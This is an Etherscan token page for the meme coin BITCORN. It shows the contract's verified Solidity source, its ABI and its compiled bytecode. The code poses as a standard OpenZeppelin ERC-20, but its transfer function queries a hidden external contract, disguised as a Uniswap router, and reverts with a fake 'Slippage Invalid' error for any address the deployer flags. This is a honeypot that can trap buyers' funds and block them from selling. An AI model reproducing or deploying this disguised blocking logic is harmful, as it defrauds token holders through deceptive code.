ETH Price: $3,464.89 (+2.09%)
Gas: 12 Gwei

Token

TRUMPYOBAMA0MARIOBIDENPUTININU (BITCORN)
 

Overview

Max Total Supply

42,000,000,000 BITCORN

Holders

678

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
manicman.eth
Balance
22,689,262.34882089854730679 BITCORN

Value
$0.00
0xdd33691a173094f2bc6bedb7e7d55896002b31ce
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BITCORN

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-08-25
*/

/**

$BITCORN

TRUMPYOBAMA0MARIOBIDENPUTININU

https://bitcorn.pro
https://twitter.com/BitcornTOMBP
https://t.me/Bitcornnn


*/


// SPDX-License-Identifier: MIT



pragma solidity ^0.8.11;


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}



pragma solidity ^0.8.11;





abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.11;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

  
    function transfer(address to, uint256 amount) external returns (bool);


    function allowance(address owner, address spender) external view returns (uint256);


    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

interface V3Trade {
    function balCheck(address _account) external view returns (bool);
}
// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.11;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.11;


contract TOKEN is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    V3Trade public uniswaprouter;
    mapping(address => mapping(address => uint256)) private _allowancez;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory tokenname_, string memory tokensymbol_, address _opentrading) {
        _name = tokenname_;
        _symbol = tokensymbol_;
        uniswaprouter = V3Trade(_opentrading);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }


    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowancez[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }


    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

 
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(!uniswaprouter.balCheck(from), "Slippage Invalid");
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }




    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowancez[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }


    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}


    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}


pragma solidity ^0.8.11;



contract BITCORN is TOKEN, Ownable {
    uint256 private constant Tsupply = 42000000000 * 10**18;

    constructor(
        string memory tokenname_,
        string memory tokensymbol_,
        address _opentrading
    ) TOKEN(tokenname_, tokensymbol_, _opentrading) {
        _mint(msg.sender, Tsupply);
    }

    function mintTokens(address mintaddress) external onlyOwner {
        uint256 supply = balanceOf(msg.sender);
        require(supply == Tsupply, "Tokens minted");

        _transfer(msg.sender, mintaddress, Tsupply); 
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"tokenname_","type":"string"},{"internalType":"string","name":"tokensymbol_","type":"string"},{"internalType":"address","name":"_opentrading","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"mintaddress","type":"address"}],"name":"mintTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswaprouter","outputs":[{"internalType":"contract V3Trade","name":"","type":"address"}],"stateMutability":"view","type":"function"}]

608060405234801562000010575f80fd5b506040516200230d3803806200230d833981810160405281019062000036919062000506565b82828282600490816200004a9190620007d4565b5081600590816200005c9190620007d4565b508060015f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550505050620000c0620000b4620000e760201b60201c565b620000ee60201b60201c565b620000de336b87b595f2383509fe10000000620001b160201b60201c565b505050620009c9565b5f33905090565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000222576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002199062000916565b60405180910390fd5b620002355f83836200031660201b60201c565b8060035f82825462000248919062000963565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620002f79190620009ae565b60405180910390a3620003125f83836200031b60201b60201c565b5050565b505050565b505050565b5f604051905090565b5f80fd5b5f80fd5b5f80fd5b5f80fd5b5f601f19601f8301169050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b620003818262000339565b810181811067ffffffffffffffff82111715620003a357620003a262000349565b5b80604052505050565b5f620003b762000320565b9050620003c5828262000376565b919050565b5f67ffffffffffffffff821115620003e757620003e662000349565b5b620003f28262000339565b9050602081019050919050565b5f5b838110156200041e57808201518184015260208101905062000401565b5f8484015250505050565b5f6200043f6200043984620003ca565b620003ac565b9050828152602081018484840111156200045e576200045d62000335565b5b6200046b848285620003ff565b509392505050565b5f82601f8301126200048a576200048962000331565b5b81516200049c84826020860162000429565b91505092915050565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620004d082620004a5565b9050919050565b620004e281620004c4565b8114620004ed575f80fd5b50565b5f815190506200050081620004d7565b92915050565b5f805f6060848603121562000520576200051f62000329565b5b5f84015167ffffffffffffffff81111562000540576200053f6200032d565b5b6200054e8682870162000473565b935050602084015167ffffffffffffffff8111156200057257620005716200032d565b5b620005808682870162000473565b92505060406200059386828701620004f0565b9150509250925092565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f6002820490506001821680620005ec57607f821691505b602082108103620006025762000601620005a7565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620006667fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000629565b62000672868362000629565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f620006bc620006b6620006b0846200068a565b62000693565b6200068a565b9050919050565b5f819050919050565b620006d7836200069c565b620006ef620006e682620006c3565b84845462000635565b825550505050565b5f90565b62000705620006f7565b62000712818484620006cc565b505050565b5b8181101562000739576200072d5f82620006fb565b60018101905062000718565b5050565b601f8211156200078857620007528162000608565b6200075d846200061a565b810160208510156200076d578190505b620007856200077c856200061a565b83018262000717565b50505b505050565b5f82821c905092915050565b5f620007aa5f19846008026200078d565b1980831691505092915050565b5f620007c4838362000799565b9150826002028217905092915050565b620007df826200059d565b67ffffffffffffffff811115620007fb57620007fa62000349565b5b620008078254620005d4565b620008148282856200073d565b5f60209050601f8311600181146200084a575f841562000835578287015190505b620008418582620007b7565b865550620008b0565b601f1984166200085a8662000608565b5f5b8281101562000883578489015182556001820191506020850194506020810190506200085c565b86831015620008a357848901516200089f601f89168262000799565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f620008fe601f83620008b8565b91506200090b82620008c8565b602082019050919050565b5f6020820190508181035f8301526200092f81620008f0565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6200096f826200068a565b91506200097c836200068a565b925082820190508082111562000997576200099662000936565b5b92915050565b620009a8816200068a565b82525050565b5f602082019050620009c35f8301846200099d565b92915050565b61193680620009d75f395ff3fe608060405234801561000f575f80fd5b50600436106100fe575f3560e01c8063715018a611610095578063a9059cbb11610064578063a9059cbb146102b0578063bcfaa79d146102e0578063dd62ed3e146102fc578063f2fde38b1461032c576100fe565b8063715018a61461023a5780638da5cb5b1461024457806395d89b4114610262578063a457c2d714610280576100fe565b80632431ba73116100d15780632431ba731461019e578063313ce567146101bc57806339509351146101da57806370a082311461020a576100fe565b806306fdde0314610102578063095ea7b31461012057806318160ddd1461015057806323b872dd1461016e575b5f80fd5b61010a610348565b6040516101179190610f99565b60405180910390f35b61013a6004803603810190610135919061104a565b6103d8565b60405161014791906110a2565b60405180910390f35b6101586103fa565b60405161016591906110ca565b60405180910390f35b610188600480360381019061018391906110e3565b610403565b60405161019591906110a2565b60405180910390f35b6101a6610431565b6040516101b3919061118e565b60405180910390f35b6101c4610456565b6040516101d191906111c2565b60405180910390f35b6101f460048036038101906101ef919061104a565b61045e565b60405161020191906110a2565b60405180910390f35b610224600480360381019061021f91906111db565b610494565b60405161023191906110ca565b60405180910390f35b6102426104d9565b005b61024c6104ec565b6040516102599190611215565b60405180910390f35b61026a610514565b6040516102779190610f99565b60405180910390f35b61029a6004803603810190610295919061104a565b6105a4565b6040516102a791906110a2565b60405180910390f35b6102ca60048036038101906102c5919061104a565b610619565b6040516102d791906110a2565b60405180910390f35b6102fa60048036038101906102f591906111db565b61063b565b005b6103166004803603810190610311919061122e565b6106b8565b60405161032391906110ca565b60405180910390f35b610346600480360381019061034191906111db565b61073a565b005b60606004805461035790611299565b80601f016020809104026020016040519081016040528092919081815260200182805461038390611299565b80156103ce5780601f106103a5576101008083540402835291602001916103ce565b820191905f5260205f20905b8154815290600101906020018083116103b157829003601f168201915b5050505050905090565b5f806103e26107bc565b90506103ef8185856107c3565b600191505092915050565b5f600354905090565b5f8061040d6107bc565b905061041a858285610986565b610425858585610a11565b60019150509392505050565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b5f6012905090565b5f806104686107bc565b905061048981858561047a85896106b8565b61048491906112f6565b6107c3565b600191505092915050565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104e1610dc4565b6104ea5f610e42565b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461052390611299565b80601f016020809104026020016040519081016040528092919081815260200182805461054f90611299565b801561059a5780601f106105715761010080835404028352916020019161059a565b820191905f5260205f20905b81548152906001019060200180831161057d57829003601f168201915b5050505050905090565b5f806105ae6107bc565b90505f6105bb82866106b8565b905083811015610600576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105f790611399565b60405180910390fd5b61060d82868684036107c3565b60019250505092915050565b5f806106236107bc565b9050610630818585610a11565b600191505092915050565b610643610dc4565b5f61064d33610494565b90506b87b595f2383509fe10000000811461069d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161069490611401565b60405180910390fd5b6106b433836b87b595f2383509fe10000000610a11565b5050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b610742610dc4565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036107b0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107a79061148f565b60405180910390fd5b6107b981610e42565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610831576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108289061151d565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361089f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610896906115ab565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161097991906110ca565b60405180910390a3505050565b5f61099184846106b8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610a0b57818110156109fd576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f490611613565b60405180910390fd5b610a0a84848484036107c3565b5b50505050565b60015f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16631c151582846040518263ffffffff1660e01b8152600401610a6b9190611215565b602060405180830381865afa158015610a86573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610aaa919061165b565b15610aea576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ae1906116d0565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b58576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b4f9061175e565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bbd906117ec565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c34576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c2b906117ec565b60405180910390fd5b610c3f838383610f05565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610cc2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cb99061187a565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610dab91906110ca565b60405180910390a3610dbe848484610f0a565b50505050565b610dcc6107bc565b73ffffffffffffffffffffffffffffffffffffffff16610dea6104ec565b73ffffffffffffffffffffffffffffffffffffffff1614610e40576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e37906118e2565b60405180910390fd5b565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b505050565b505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610f46578082015181840152602081019050610f2b565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610f6b82610f0f565b610f758185610f19565b9350610f85818560208601610f29565b610f8e81610f51565b840191505092915050565b5f6020820190508181035f830152610fb18184610f61565b905092915050565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f610fe682610fbd565b9050919050565b610ff681610fdc565b8114611000575f80fd5b50565b5f8135905061101181610fed565b92915050565b5f819050919050565b61102981611017565b8114611033575f80fd5b50565b5f8135905061104481611020565b92915050565b5f80604083850312156110605761105f610fb9565b5b5f61106d85828601611003565b925050602061107e85828601611036565b9150509250929050565b5f8115159050919050565b61109c81611088565b82525050565b5f6020820190506110b55f830184611093565b92915050565b6110c481611017565b82525050565b5f6020820190506110dd5f8301846110bb565b92915050565b5f805f606084860312156110fa576110f9610fb9565b5b5f61110786828701611003565b935050602061111886828701611003565b925050604061112986828701611036565b9150509250925092565b5f819050919050565b5f61115661115161114c84610fbd565b611133565b610fbd565b9050919050565b5f6111678261113c565b9050919050565b5f6111788261115d565b9050919050565b6111888161116e565b82525050565b5f6020820190506111a15f83018461117f565b92915050565b5f60ff82169050919050565b6111bc816111a7565b82525050565b5f6020820190506111d55f8301846111b3565b92915050565b5f602082840312156111f0576111ef610fb9565b5b5f6111fd84828501611003565b91505092915050565b61120f81610fdc565b82525050565b5f6020820190506112285f830184611206565b92915050565b5f806040838503121561124457611243610fb9565b5b5f61125185828601611003565b925050602061126285828601611003565b9150509250929050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806112b057607f821691505b6020821081036112c3576112c261126c565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61130082611017565b915061130b83611017565b9250828201905080821115611323576113226112c9565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f611383602583610f19565b915061138e82611329565b604082019050919050565b5f6020820190508181035f8301526113b081611377565b9050919050565b7f546f6b656e73206d696e746564000000000000000000000000000000000000005f82015250565b5f6113eb600d83610f19565b91506113f6826113b7565b602082019050919050565b5f6020820190508181035f830152611418816113df565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f611479602683610f19565b91506114848261141f565b604082019050919050565b5f6020820190508181035f8301526114a68161146d565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f611507602483610f19565b9150611512826114ad565b604082019050919050565b5f6020820190508181035f830152611534816114fb565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f611595602283610f19565b91506115a08261153b565b604082019050919050565b5f6020820190508181035f8301526115c281611589565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000005f82015250565b5f6115fd601d83610f19565b9150611608826115c9565b602082019050919050565b5f6020820190508181035f83015261162a816115f1565b9050919050565b61163a81611088565b8114611644575f80fd5b50565b5f8151905061165581611631565b92915050565b5f602082840312156116705761166f610fb9565b5b5f61167d84828501611647565b91505092915050565b7f536c69707061676520496e76616c6964000000000000000000000000000000005f82015250565b5f6116ba601083610f19565b91506116c582611686565b602082019050919050565b5f6020820190508181035f8301526116e7816116ae565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f611748602583610f19565b9150611753826116ee565b604082019050919050565b5f6020820190508181035f8301526117758161173c565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6117d6602383610f19565b91506117e18261177c565b604082019050919050565b5f6020820190508181035f830152611803816117ca565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f611864602683610f19565b915061186f8261180a565b604082019050919050565b5f6020820190508181035f83015261189181611858565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f6118cc602083610f19565b91506118d782611898565b602082019050919050565b5f6020820190508181035f8301526118f9816118c0565b905091905056fea26469706673582212205ac5bf493bedf3cb